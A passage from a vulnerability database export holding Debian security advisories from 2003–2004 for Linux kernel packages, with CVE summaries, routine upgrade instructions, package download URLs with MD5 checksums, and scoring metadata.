http://security.debian.org/pool/updates/main/k/kernel-source-2.2.20/kernel-source-2.2.20_2.2.20-5woody2.dsc\n Size/MD5 checksum: 661 d3215fce4f216c046cccff92446e7918\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.20/kernel-source-2.2.20_2.2.20-5woody2.diff.gz\n Size/MD5 checksum: 159446 a579fda249086961d987de8781049f78\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.20/kernel-source-2.2.20_2.2.20.orig.tar.gz\n Size/MD5 checksum: 19394649 57c0edf86cb23a5b215db9121c9b3557\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-i386/kernel-image-2.2.20-i386_2.2.20-5woody3.dsc\n Size/MD5 checksum: 834 fa03ee805dd5024d730f49e0316dbf53\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-i386/kernel-image-2.2.20-i386_2.2.20-5woody3.tar.gz\n Size/MD5 checksum: 13928 0ccb61809634f83fd20de3079deb297c\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.20/kernel-doc-2.2.20_2.2.20-5woody2_all.deb\n Size/MD5 checksum: 1162314 d3f23563af939c6d1f68860ce0419744\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.20/kernel-source-2.2.20_2.2.20-5woody2_all.deb\n Size/MD5 checksum: 15848472 0682fd4283579c341fa9ca27461cbad0\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-i386/kernel-headers-2.2.20_2.2.20-5woody3_i386.deb\n Size/MD5 checksum: 1918624 d1d1f98e147fdf12a7374ff705ba89a7\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-i386/kernel-headers-2.2.20-compact_2.2.20-5woody3_i386.deb\n Size/MD5 checksum: 1867132 93d8ac12f8a884913ad88aeeb7a8ea1b\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-i386/kernel-headers-2.2.20-idepci_2.2.20-5woody3_i386.deb\n Size/MD5 checksum: 1839328 e3fb8a95dd2a1ba641fd598a019879c0\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-i386/kernel-image-2.2.20_2.2.20-5woody3_i386.deb\n Size/MD5 checksum: 5901626 3fa8bae1676466e02992a1ce80009697\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-i386/kernel-image-2.2.20-compact_2.2.20-5woody3_i386.deb\n Size/MD5 checksum: 1733362 5d5293e99f68cbabb1489226903f4895\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-i386/kernel-image-2.2.20-idepci_2.2.20-5woody3_i386.deb\n Size/MD5 checksum: 1395212 70389d3561e392a5487b493d24e2abfe\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 1, "reporter": "Debian", "published": "2003-06-29T00:00:00", "title": "[SECURITY] [DSA-336-1] New Linux 2.2.20 packages and i386 kernel images fix several vulnerabilities", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:12:57", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2003-0248", "CVE-2003-0247", "CVE-2002-0429", "CVE-2003-0127", "CVE-2003-0364", "CVE-2003-0001", "CVE-2003-0246", "CVE-2003-0244"], "modified": "2003-06-29T00:00:00", "id": "DEBIAN:DSA-336-1:77295", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2003/msg00130.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-16T22:13:36", "references": [], "affectedPackage": [], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 311-1 security@debian.org\nhttp://www.debian.org/security/ Matt Zimmerman\nJune 8th, 2003 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel\nVulnerability : several\nProblem-Type : local, remote\nDebian-specific: no\nCVE Ids : CVE-2002-0429 CAN-2003-0001 CAN-2003-0127 CAN-2003-0244 CAN-2003-0246 CAN-2003-0247 CAN-2003-0248 CAN-2003-0364\n\nA number of vulnerabilities have been discovered in the Linux kernel.\n\n- - CVE-2002-0429: The iBCS routines in arch/i386/kernel/traps.c for\n Linux kernels 2.4.18 and earlier on x86 systems allow local users to\n kill arbitrary processes via a a binary compatibility interface\n (lcall)\n\n- - CAN-2003-0001: Multiple ethernet Network Interface Card (NIC) device\n drivers do not pad frames with null bytes, which allows remote\n attackers to obtain information from previous packets or kernel\n memory by using malformed packets\n\n- - CAN-2003-0127: The kernel module loader allows local users to gain\n root privileges by using ptrace to attach to a child process that is\n spawned by the kernel\n\n- - CAN-2003-0244: The route cache implementation in Linux 2.4, and the\n Netfilter IP conntrack module, allows remote attackers to cause a\n denial of service (CPU consumption) via packets with forged source\n addresses that cause a large number of hash table collisions related\n to the PREROUTING chain\n\n- - CAN-2003-0246: The ioperm system call in Linux kernel 2.4.20 and\n earlier does not properly restrict privileges, which allows local\n users to gain read or write access to certain I/O ports.\n\n- - CAN-2003-0247: vulnerability in the TTY layer of the Linux kernel\n 2.4 allows attackers to cause a denial of service ("kernel oops")\n\n- - CAN-2003-0248: The mxcsr code in Linux kernel 2.4 allows attackers\n to modify CPU state registers via a malformed address.\n\n- - CAN-2003-0364: The TCP/IP fragment reassembly handling in the Linux\n kernel 2.4 allows remote attackers to cause a denial of service (CPU\n consumption) via certain packets that cause a large number of hash\n table collisions\n\nThis advisory covers only the i386 (Intel IA32) architectures. Other\narchitectures will be covered by separate advisories.\n\nFor the stable distribution (woody) on the i386 architecture, these\nproblems have been fixed in kernel-source-2.4.18 version 2.4.18-9,\nkernel-image-2.4.18-1-i386 version 2.4.18-8, and\nkernel-image-2.4.18-i386bf version 2.4.18-5woody1.\n\nFor the unstable distribution (sid) these problems are fixed in the\n2.4.20 series kernels based on Debian sources.\n\nWe recommend that you update your kernel packages.\n\nIf you are using the kernel installed by the installation system when\nthe "bf24" option is selected (for a 2.4.x kernel), you should install\nthe kernel-image-2.4.18-bf2.4 package. If you installed a different\nkernel-image package after installation, you should install the\ncorresponding 2.4.18-1 kernel. You may use the table below as a\nguide.\n\n| If "uname -r" shows: | Install this package:\n- ------------------------------------------------------\n| 2.4.18-bf2.4 | kernel-image-2.4.18-bf2.4\n| 2.4.18-386 | kernel-image-2.4.18-1-386\n| 2.4.18-586tsc | kernel-image-2.4.18-1-586tsc\n| 2.4.18-686 | kernel-image-2.4.18-1-686\n| 2.4.18-686-smp | kernel-image-2.4.18-1-686-smp\n| 2.4.18-k6 | kernel-image-2.4.18-1-k6\n| 2.4.18-k7 | kernel-image-2.4.18-1-k7\n\nNOTE: that this kernel is not binary compatible with the previous\nversion. For this reason, the kernel has a different version number\nand will not be installed automatically as part of the normal upgrade\nprocess. Any custom modules will need to be rebuilt in order to work\nwith the new kernel. New PCMCIA modules are provided for all of the\nabove kernels.\n\nNOTE: A system reboot will be required immediately after the upgrade\nin order to replace the running kernel. Remember to read carefully\nand follow the instructions given during the kernel upgrade process.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-i386_2.4.18-8.dsc\n Size/MD5 checksum: 1322 945d8d05b054684880e3af31b28a9e49\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-i386_2.4.18-8.tar.gz\n Size/MD5 checksum: 69411 0fa830e16d4f5e46fe1f0ebe0343d11c\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1_2.4.18-8_i386.deb\n Size/MD5 checksum: 3397470 b79b975b73aa31da8b9938aba905a9f6\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-386_2.4.18-8_i386.deb\n Size/MD5 checksum: 3487116 90799a6ccc058be247b235c21ec61503\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-586tsc_2.4.18-8_i386.deb\n Size/MD5 checksum: 3487614 9453587923dd16a964b028d4ba2f9a63\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-686_2.4.18-8_i386.deb\n Size/MD5 checksum: 3487368 5513db336e824b2d16aa503a292047f0\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-686-smp_2.4.18-8_i386.deb\n Size/MD5 checksum: 3488672 afbb191c23dfabb30fe7a8aa1a99bd1f\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-k6_2.4.18-8_i386.deb\n Size/MD5 checksum: 3487282 70ee63953c653de7dfa83531b8ce1245\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-k7_2.4.18-8_i386.deb\n Size/MD5 checksum: 3487402 27c7b5077ed009217a01dbeafa311915\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-386_2.4.18-8_i386.deb\n Size/MD5 checksum: 8795814 1cc6de04aa29d9766d48c4c36ae64b3e\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-586tsc_2.4.18-8_i386.deb\n Size/MD5 checksum: 8703468 43a2d50765140751ac8fd878f7b66950\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-686_2.4.18-8_i386.deb\n Size/MD5 checksum: 8700336 894ded8e3e34be04b741ac706d5cc288\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-686-smp_2.4.18-8_i386.deb\n Size/MD5 checksum: 8959054 b59983d4ed1d9f214fe17bf624a85df7\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-k6_2.4.18-8_i386.deb\n Size/MD5 checksum: 8659474 6d86c580433b69464c238e69eec8ad9e\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-k7_2.4.18-8_i386.deb\n Size/MD5 checksum: 8861530 5f1935679b4628636f8da61f54a95fee\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-386_2.4.18-8_i386.deb\n Size/MD5 checksum: 227910 06d05b43ca1a5ec9700274f6d1035c31\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-586tsc_2.4.18-8_i386.deb\n Size/MD5 checksum: 227482 c5f357cf54a363ff62f6037a41a0702a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-686_2.4.18-8_i386.deb\n Size/MD5 checksum: 226924 9d8aa23b21e71aa603c66f47f35e967f\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-686-smp_2.4.18-8_i386.deb\n Size/MD5 checksum: 230574 7d25c186114a62b609bedab0f5354d0b\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-k6_2.4.18-8_i386.deb\n Size/MD5 checksum: 226564 540eabdaf90bcda800221c712c996524\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-k7_2.4.18-8_i386.deb\n Size/MD5 checksum: 229836 d63194dd5ae452d0a7d814ee9b75a60a\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-i386bf/kernel-image-2.4.18-i386bf_2.4.18-5woody1.dsc\n Size/MD5 checksum: 653 d3a0a6b26b6282d9ba8af5c2f7008378\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-i386bf/kernel-image-2.4.18-i386bf_2.4.18-5woody1.tar.gz\n Size/MD5 checksum: 25420 66fe5aac9c60c4dfa865d563dfbbaed5\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-i386bf/kernel-headers-2.4.18-bf2.4_2.4.18-5woody1_i386.deb\n Size/MD5 checksum: 3409156 325717b6867a715d5a0ef8364d8cb29c\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-i386bf/kernel-image-2.4.18-bf2.4_2.4.18-5woody1_i386.deb\n Size/MD5 checksum: 6423164 d510d8aaedbeb91fa2e90e9cabf5b39b\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18-9.dsc\n Size/MD5 checksum: 796 fac77414e913e144645d22048b19bf01\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18-9.diff.gz\n Size/MD5 checksum: 60409 443b9fee98c7d22995efbdeca3ca1afc\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18.orig.tar.gz\n Size/MD5 checksum: 29818323 24b4c45a04a23eb4ce465eb326a6ddf2\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-doc-2.4.18_2.4.18-9_all.deb\n Size/MD5 checksum: 1709588 9bbb7ae427dc843d0c5ebe0f4a013cb4\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18-9_all.deb\n Size/MD5 checksum: 23885800 e12cb29bd638ec9bdedacd07f31a6921\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/p/pcmcia-cs/pcmcia-modules-2.4.18-bf2.4_3.1.33-6woody1k5woody1_i386.deb\n Size/MD5 checksum: 403194 30c203861afa9678cc5fb08f90021ba6\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 1, "reporter": "Debian", "published": "2003-06-08T00:00:00", "title": "[SECURITY] [DSA-311-1] New kernel packages fix several vulnerabilities", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:13:36", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2003-0248", "CVE-2003-0247", "CVE-2002-0429", "CVE-2003-0127", "CVE-2003-0364", "CVE-2003-0001", "CVE-2003-0246", "CVE-2003-0244"], "modified": "2003-06-08T00:00:00", "id": "DEBIAN:DSA-311-1:8C207", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2003/msg00100.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-16T22:13:03", "references": [], "affectedPackage": [], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 332-1 security@debian.org\nhttp://www.debian.org/security/ Matt Zimmerman\nJune 27th, 2003 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-source-2.4.17, kernel-patch-2.4.17-mips\nVulnerability : several\nProblem-Type : local, remote\nDebian-specific: no\nCVE Ids : CVE-2002-0429 CAN-2003-0001 CAN-2003-0127 CAN-2003-0244 CAN-2003-0246 CAN-2003-0247 CAN-2003-0248 CAN-2003-0364\n\nA number of vulnerabilities have been discovered in the Linux kernel.\n\n- - CVE-2002-0429: The iBCS routines in arch/i386/kernel/traps.c for\n Linux kernels 2.4.18 and earlier on x86 systems allow local users to\n kill arbitrary processes via a a binary compatibility interface\n (lcall)\n\n- - CAN-2003-0001: Multiple ethernet Network Interface Card (NIC) device\n drivers do not pad frames with null bytes, which allows remote\n attackers to obtain information from previous packets or kernel\n memory by using malformed packets\n\n- - CAN-2003-0127: The kernel module loader allows local users to gain\n root privileges by using ptrace to attach to a child process that is\n spawned by the kernel\n\n- - CAN-2003-0244: The route cache implementation in Linux 2.4, and the\n Netfilter IP conntrack module, allows remote attackers to cause a\n denial of service (CPU consumption) via packets with forged source\n addresses that cause a large number of hash table collisions related\n to the PREROUTING chain\n\n- - CAN-2003-0246: The ioperm system call in Linux kernel 2.4.20 and\n earlier does not properly restrict privileges, which allows local\n users to gain read or write access to certain I/O ports.\n\n- - CAN-2003-0247: vulnerability in the TTY layer of the Linux kernel\n 2.4 allows attackers to cause a denial of service ("kernel oops")\n\n- - CAN-2003-0248: The mxcsr code in Linux kernel 2.4 allows attackers\n to modify CPU state registers via a malformed address.\n\n- - CAN-2003-0364: The TCP/IP fragment reassembly handling in the Linux\n kernel 2.4 allows remote attackers to cause a denial of service (CPU\n consumption) via certain packets that cause a large number of hash\n table collisions\n\nThis advisory provides corrected source code for Linux 2.4.17, and\ncorrected binary kernel images for the mips and mipsel architectures.\nOther versions and architectures will be covered by separate\nadvisories.\n\nFor the stable distribution (woody), these problems have been fixed in\nkernel-source-2.4.17 version 2.4.17-1woody1 and\nkernel-patch-2.4.17-mips version 2.4.17-0.020226.2.woody2.\n\nFor the unstable distribution (sid) these problems are fixed in\nkernel-source-2.4.20 version 2.4.20-8.\n\nWe recommend that you update your kernel packages.\n\nNOTE: A system reboot will be required immediately after the upgrade\nin order to replace the running kernel. Remember to read carefully\nand follow the instructions given during the kernel upgrade process.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody2.dsc\n Size/MD5 checksum: 786 22545e621e57307760966baa10b841fc\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody2.tar.gz\n Size/MD5 checksum: 1146581 9f28eec81b8eb17d10b92655304ee892\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody2_all.deb\n Size/MD5 checksum: 1148854 3b24c4ea5d2d64219de78708abe97457\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-headers-2.4.17_2.4.17-0.020226.2.woody2_mips.deb\n Size/MD5 checksum: 3475338 10faf449f8d96e17f6bf250b83de9b09\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r4k-ip22_2.4.17-0.020226.2.woody2_mips.deb\n Size/MD5 checksum: 2042164 5d9c3e556d4b25a3966bbd2e1b2db765\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r5k-ip22_2.4.17-0.020226.2.woody2_mips.deb\n Size/MD5 checksum: 2041978 02f5c02d1937ef5aed708e975e828b3f\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-headers-2.4.17_2.4.17-0.020226.2.woody2_mipsel.deb\n Size/MD5 checksum: 3474076 708d1aefc6b95869373cbd3beec2643d\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r3k-kn02_2.4.17-0.020226.2.woody2_mipsel.deb\n Size/MD5 checksum: 2196544 42b2446e2c7b19cc3c5ddc674e3f7d06\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r4k-kn04_2.4.17-0.020226.2.woody2_mipsel.deb\n Size/MD5 checksum: 2192732 c531b9515e1e7ac9b555a6ebc58fd172\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/mips-tools_2.4.17-0.020226.2.woody2_mipsel.deb\n Size/MD5 checksum: 14884 341113e795e533fb6de04eb49ad17c97\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody1.dsc\n Size/MD5 checksum: 690 4c2994b996abb2960711fe1e6e962712\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody1.diff.gz\n Size/MD5 checksum: 38092 4cec4a35b4bbd27a9f54a6c9d9dc5019\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17.orig.tar.gz\n Size/MD5 checksum: 29445154 d5de2a4dc49e32c37e557ef856d5d132\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-doc-2.4.17_2.4.17-1woody1_all.deb\n Size/MD5 checksum: 1719692 ec59d9331d0654a67859c40ab3abf260\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody1_all.deb\n Size/MD5 checksum: 23878706 031649d73da791becf1c4f0c69d13ce1\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody1_alpha.deb\n Size/MD5 checksum: 16510 381f00dd2c315eb7926dd18a039a4d4a\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody1_arm.deb\n Size/MD5 checksum: 15224 37d883ab4530e22b28b29c86ccbe4c0a\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody1_i386.deb\n Size/MD5 checksum: 14876 46fa25b8cce097c219e16d96947abb7d\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody1_ia64.deb\n Size/MD5 checksum: 18600 503f0919f883668553f8bd973c84eb98\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody1_hppa.deb\n Size/MD5 checksum: 16216 90ba4a9476c5126fc581331866f59040\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody1_m68k.deb\n Size/MD5 checksum: 14718 e316ab0b4c10c64f9644667c475c53ac\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody1_mips.deb\n Size/MD5 checksum: 15884 3498ee16ddc2738919e244282087ab7f\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody1_mipsel.deb\n Size/MD5 checksum: 15882 4feae5bd3f11ce0e326fa9f0dfb00c74\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody1_powerpc.deb\n Size/MD5 checksum: 15618 44262ab37f81982802aeef31d9688d79\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody1_s390.deb\n Size/MD5 checksum: 15750 54f39327009b585031595a8d89628bca\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody1_sparc.deb\n Size/MD5 checksum: 17710 1967f9527247961f55e98d7d6edc4d86\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 1, "reporter": "Debian", "published": "2003-06-28T00:00:00", "title": "[SECURITY] [DSA-332-1] New Linux 2.4.17 source code and MIPS kernel images fix several vulnerabilities", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:13:03", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2003-0248", "CVE-2003-0247", "CVE-2002-0429", "CVE-2003-0127", "CVE-2003-0364", "CVE-2003-0001", "CVE-2003-0246", "CVE-2003-0244"], "modified": "2003-06-28T00:00:00", "id": "DEBIAN:DSA-332-1:21823", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2003/msg00126.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-16T22:13:36", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "3", "packageVersion": "2.4.17-2.woody.3", "arch": "all", "packageFilename": "kernel-patch-2.4.17-s390, kernel-image-2.4.17-s390_2.4.17-2.woody.3_all.deb", "packageName": "kernel-patch-2.4.17-s390, kernel-image-2.4.17-s390", "operator": "lt"}], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 442-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nFebruary 19th, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-patch-2.4.17-s390, kernel-image-2.4.17-s390\nVulnerability : several\nProblem-Type : local, remote\nDebian-specific: no\nCVE ID : CAN-2003-0001 CAN-2003-0244 CAN-2003-0246 CAN-2003-0247 CAN-2003-0248 CAN-2003-0364 CAN-2003-0961 CAN-2003-0985 CAN-2004-0077 CVE-2002-0429\n\nSeveral security related problems have been fixed in the Linux kernel\n2.4.17 used for the S/390 architecture, mostly by backporting fixes\nfrom 2.4.18 and incorporating recent security fixes. The corrections\nare listed below with the identification from the Common\nVulnerabilities and Exposures (CVE) project:\n\nCAN-2002-0429:\n\n The iBCS routines in arch/i386/kernel/traps.c for Linux kernels\n 2.4.18 and earlier on x86 systems allow local users to kill\n arbitrary processes via a a binary compatibility interface (lcall)\n\nCAN-2003-0001:\n\n Multiple ethernet network interface card (NIC) device drivers do\n not pad frames with null bytes, which allows remote attackers to\n obtain information from previous packets or kernel memory by using\n malformed packets, as demonstrated by Etherleak.\n\nCAN-2003-0244:\n\n The route cache implementation in Linux 2.4, and the Netfilter IP\n conntrack module, allows remote attackers to cause a denial of\n service (CPU consumption) via packets with forged source addresses\n that cause a large number of hash table collisions related to the\n PREROUTING chain\n\nCAN-2003-0246:\n\n The ioperm system call in Linux kernel 2.4.20 and earlier does not\n properly restrict privileges, which allows local users to gain read\n or write access to certain I/O ports.\n\nCAN-2003-0247:\n\n A vulnerability in the TTY layer of the Linux kernel 2.4 allows\n attackers to cause a denial of service ("kernel oops").\n\nCAN-2003-0248:\n\n The mxcsr code in Linux kernel 2.4 allows attackers to modify CPU\n state registers via a malformed address.\n\nCAN-2003-0364:\n\n The TCP/IP fragment reassembly handling in the Linux kernel 2.4\n allows remote attackers to cause a denial of service (CPU\n consumption) via certain packets that cause a large number of hash\n table collisions\n\nCAN-2003-0961:\n\n An integer overflow in brk() system call (do_brk() function) for\n Linux allows a local attacker to gain root privileges. Fixed\n upstream in Linux 2.4.23.\n\nCAN-2003-0985:\n\n Paul Starzetz discovered a flaw in bounds checking in mremap() in\n the Linux kernel (present in version 2.4.x and 2.6.x) which may\n allow a local attacker to gain root privileges. Version 2.2 is not\n affected by this bug. Fixed upstream in Linux 2.4.24.\n\nCAN-2004-0077:\n\n Paul Starzetz and Wojciech Purczynski of isec.pl discovered a\n critical security vulnerability in the memory management code of\n Linux inside the mremap(2) system call. Due to missing function\n return value check of internal functions a local attacker can gain\n root privileges. Fixed upstream in Linux 2.4.25 and 2.6.3.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 2.4.17-2.woody.3 of s390 images and in version\n0.0.20020816-0.woody.2 of the patch packages.\n\nFor the unstable distribution (sid) these problems will be fixed soon.\n\nWe recommend that you upgrade your Linux kernel packages immediately.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-s390/kernel-patch-2.4.17-s390_0.0.20020816-0.woody.2.dsc\n Size/MD5 checksum: 754 8f59252c74198c796f544ac312cbf522\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-s390/kernel-patch-2.4.17-s390_0.0.20020816-0.woody.2.diff.gz\n Size/MD5 checksum: 5824 81d3c045df500f3e2da56de87b4c434d\n 